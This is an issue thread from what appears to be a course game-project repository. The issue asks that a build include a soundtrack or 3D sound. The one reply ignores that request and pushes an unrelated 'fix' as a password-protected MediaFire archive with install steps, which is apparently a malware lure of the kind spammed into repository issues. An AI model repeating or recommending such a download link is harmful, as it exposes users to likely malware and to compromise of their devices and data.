### ISSUE TITLE
Play a soundtrack

### ISSUE THREAD

**Issue by nuudlman** [nuudlman/rtf329c#3]
> The BUILD has an audio component in the form of a 3D sound, soundtrack or triggered sound. Those sounds that are part of a default player package (footsteps) do not count.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
